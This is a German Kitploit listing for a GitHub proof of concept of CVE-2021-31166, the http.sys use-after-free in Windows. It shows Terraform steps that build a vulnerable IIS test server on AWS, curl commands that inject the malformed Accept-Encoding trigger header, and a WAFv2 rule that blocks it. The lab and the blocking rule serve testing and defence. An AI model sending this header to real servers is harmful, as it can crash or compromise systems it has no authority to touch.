Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
WIn-CVE-2021-31166 — Proof-of-Concept für CVE-2021-31166 (http.sys RCE) mit Terraform-Bereitstellung auf AWS, einschließlich Testskripten und einer WAFv2-Regel, um den Exploit zu blockieren. | Kitploit
Tools/GitHubGitHub/bgsilvait/win-cve-2021-31166
SchwachstellenanalyseExploitationIDS/IPS-UmgehungWebsicherheitCloud-SicherheitDevSecOps
GitHubbgsilvait/win-cve-2021-31166

WIn-CVE-2021-31166

Proof-of-Concept für CVE-2021-31166 (http.sys RCE) mit Terraform-Bereitstellung auf AWS, einschließlich Testskripten und einer WAFv2-Regel, um den Exploit zu blockieren.

Repository anzeigen
12vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WIn-CVE-2021-31166

Dieses Repository ist inspiriert von 0vercl0k für einen Proof-of-Concept für CVE-2021-31166 ("HTTP Protocol Stack Remote Code Execution Vulnerability"), eine Use-After-Free-Dereferenzierung in http.sys, die von Microsoft im Mai 2021 gepatcht wurde.

Build-Infrastruktur

git clone https://github.com/bgsilvait/WIn-CVE-2021-31166.git
cd WIn-CVE-2021-31166
terraform init
terraform plan
terraform apply --auto-approve

Das Terraform-Skript erstellt eine EC2-Instanz mit Windows Server Core 20H2, installiert IIS und fügt SSM-Berechtigungen hinzu, um eine Web-PowerShell-Sitzung von der AWS-Konsole aus zu öffnen. Es erstellt außerdem einen Application Load Balancer und verwendet die Instanz als Ziel. Standardmäßig fügt die Security Group nur IHRE IP als zulässig für den Zugriff per HTTP hinzu.

Werte abrufen

#Define Values from Terraform Output
ALB=$(terraform output -raw lb_dns_name)
EC2IP=$(terraform output -json public_ip | jq -r '.[0]')

Konnektivität testen

#Testing to ALB
while true; do curl -I $ALB --connect-timeout 1 ; done

#Testing Directly to EC2'
while true; do curl -I $EC2IP --connect-timeout 1 ; done

CVE-Header injizieren

#Testing to ALB
curl -i $ALB -H "Accept-Encoding: doar-e, ftw, imo, ,"

#Testing Directly to EC2'
curl -i $EC2IP -H "Accept-Encoding: doar-e, ftw, imo, ,"

Regel für AWS WAFv2 zum Blockieren

{
  "Name": "cve-block",
  "Priority": 0,
  "Statement": {
    "ByteMatchStatement": {
      "SearchString": "doar-e, ftw, imo, ,",
      "FieldToMatch": {
        "SingleHeader": {
          "Name": "accept-encoding"
        }
      },
      "TextTransformations": [
        {
          "Priority": 0,
          "Type": "NONE"
        }
      ],
      "PositionalConstraint": "EXACTLY"
    }
  },
  "Action": {
    "Block": {
      "CustomResponse": {
        "ResponseCode": 418,
        "CustomResponseBodyKey": "418"
      }
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "cve-block"
  }
}
Tool herunterladen